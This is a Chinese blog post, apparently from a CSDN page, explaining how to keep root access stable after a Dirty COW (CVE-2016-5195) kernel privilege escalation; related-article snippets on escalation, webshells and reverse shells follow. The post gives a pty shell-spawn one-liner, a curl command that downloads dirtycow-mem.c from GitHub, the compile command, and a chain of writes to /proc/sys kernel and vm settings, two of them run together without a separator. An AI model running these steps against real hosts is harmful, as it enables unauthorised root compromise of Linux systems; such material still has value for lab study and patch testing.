脏牛提权实现稳定性

最新推荐文章于 2024-06-04 22:27:28 发布
原创 最新推荐文章于 2024-06-04 22:27:28 发布 · 372 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#脏牛提权 #权限提升

文章介绍了在使用脏牛漏洞进行提权后可能出现权限不稳定的问题,提供了一种解决方案。首先,通过将交互式shell更改为pty类型来增强操作性,然后检查内核版本确认在受影响范围内。接下来,通过下载并编译dirtycow-mem.c源码生成可执行文件,上传到目标主机并执行,以此实现提权。最后,通过修改系统参数来保持权限的稳定性,确保能进行后续的高权限操作。

基本概述

有时候我们在使用脏牛提权后会出现权限不稳定容易掉的情况,本篇文章主要提供一种解决方法

操作流程

获取shell之后为了便于操作我们这里更改交互式shell为pty类型:

python3 -c "import pty;pty.spawn('/bin/bash')"

从上面可以看到这里并非root用户,所以我们下一步需要进行一次权限提升,之后查看内核版本——4.4.0-21-generic

uname -a

发现在影响范围内,所以之后我们使用脏牛进行提权:

curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c > test.c 
gcc -Wall -o test test.c -ldl -lpthread

之后上传编译好的文件到目标主机:


之后执行载荷,进行权限提升:



之后保持利用稳定​​​​​​​ 

echo 0 > /proc/sys/vm/dirty_writeback_centisecsecho 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn

之后就可以平稳的进行你的后续高权限操作了~

linux思路总结
weixin_43199413的博客
07-20 1503
linux思路总结 前言 说到,首先需要获得网站的webshell限,再说的操作。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell就是网站管理员,只有站长才可以升你的限。 除非你用不正当手法入侵网
Linux权限提升总结
m0_66458291的博客
04-01 1856
本文总结了Linux的一些检测项目和常见的方式,如suid CVE漏洞管道、环境变量、定时任务天、限配置特、MDUT、Rsync、Docker、sudo、policykit
dirtycowlinuxexp
03-25
dirtycowlinuxexp
(靶机复现)
tubug的博客
03-26 5117
漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号的CVE编号是CVE-2016-5195。漏洞危害低限用户利用该漏洞技术可以在全版本Linux系统上实现本地漏洞原理。
Linux(CVE-2016-5195)Dirty cow漏洞利用
m0_73927535的博客
06-04 1356
1、虚拟机 环境2、下载后解压 ,虚拟机打开二、信息收集1、查看kali本机IP<192.168.209.152>,进行本网段扫描2、扫描到有一个IP<192.168.209.154>,这个就是同网段靶机的IP。3、 扫描端口,发现开放了三个端口4、访问1898端口,本机或kali访问都可以。
靶机Lampiao之
10-02 1850
同样,将下载好的EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,限还是不够,对Linux进行信息收集,查看可以用的漏洞,并限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
CVE-2016-5159 内核
weixin_51339377的博客
04-09 1032
Linux内核 漏洞 Linux内核的子系统在处理写入时复制至产生了竞争条件 恶意用户可以利用此漏洞来获得高限 对只读内存映射进行访问 并且在的时候 杀毒软件并不会检测到 影响范围: Linux内核>=2.6.22 (2007年发行)开始就受到了影响,直到2016年10月18日才修复 查看内核的版本 uname -a 查看用户的限 id 进行即可 ls ./dirty 漏洞原理: 该漏洞具体为,get_us...
揭秘Web安全:XSS与技术
资源摘要信息:"xss、.zip" 一、XSS注入闯关小游戏知识点 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络攻击技术,攻击者通过在目标网站的页面中注入恶意脚本代码,当其他用户浏览该页面时,...
靶机返弹shell
最新发布
03-21
根据引用中的靶机示例(比如Lampiao),通常渗透测试的步骤是先获取初始访问限,再通过。因此,教程可能需要从低限shell开始,使用漏洞获取root限,然后设置反弹shell。 然后,考虑漏洞利用的...
Adore-ng-0.41源码分析:实现文件、进程与端口隐藏的安全工具
该功能可能通过利用Linux内核中的漏洞(如漏洞Dirty COW、ptrace漏洞等)或通过加载内核模块来修改当前进程的凭证(如uid、euid、gid等)。获得root限意味着攻击者可以对系统进行任意操作,包括安装恶意软件、...
DirtyCow-EXP:编译好的漏洞(CVE-2016-5195)EXP
05-16
DirtyCow-EXP 编译好的漏洞(CVE-2016-5195)EXP,分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考:
lampiao漏洞
vilice的博客
10-13 968
Linux练习
及交互shell
weixin_43047908的博客
07-03 3024
目录什么是漏洞?影响范围及危害漏洞复现环境搭建完全交互shell限维持 什么是漏洞? 漏洞(CVE-2016–5195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
ubuntu 命令卡住_Ubuntu内核(CVE-2017-16995)漏洞的复现&漏洞
weixin_39631344的博客
10-22 288
Ubuntu内核漏洞的复现这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地漏洞,漏洞编号为CVE-2017-16995。漏洞分享:Ubuntu本地(CVE-2017-16995)参考链接:https://blog.youkuaiyun.com/...
Linux(CVE-2016-5195)保姆级教程
weixin_68408599的博客
08-17 7788
对CVE-2016-5159的保姆级的教程
权限提升-Linux内核漏洞&SUID&信息搜集
qq_59350385的博客
05-12 787
目录 一、信息搜集 二、Linux SUID 【漏洞成因】: 【查看suid和guid文件】: 【其他命令】: 【常用方式】: namp: find vi/vim less more mv /cp nano awk man wget python perl tcpdump 三、内核漏洞演示 【靶标】 【工具】 【测试】 一、信息搜集 自动化脚本利用 两个信息收集:LinEnum,linuxpricchecker 两个漏洞..
复现(CVE-2016-5159)
qq_40671478的博客
09-02 1953
(CVE-2016-5159) 漏洞原理: 该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。当我们向带有MAP_PRIVATE标记的只读文件映射区域写数据时,会产生一个映射文件的复制(COW),对此区域的任何修改都不会写回原来的文件,如果上述的竞态条件发生,就能成功的写回原来的文件。比如我们修改su或者passwd程序就可以达到root的目的。
温和的跳跃
01-25 661
本来我在研究docker逃逸的结果看到。那就研究这个吧。dirty crow ...... 都是内核那点事。。。。。
android 跨进程注入,新方法可利用 Android 漏洞,窃取敏感信息、执行恶意操作...
weixin_28909503的博客
05-28 460
Dirty COW (研究员又发现了一种新的方法针对漏洞升操作限。该新方法可以直接将恶意代码注入正在运行的进程。PoC 验证该验证过程被上传到研究人员在一部 Android 手机上,安装了一个特殊验证应用。一旦运行,攻击者就可以利用漏洞窃取设备信息、更改系统设置(开启蓝牙和Wi-Fi热点)、获取地理位置,并可静默安装谷歌应用商店以外的应用。原因当执行一个 ELF 文件时,Linux 内...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值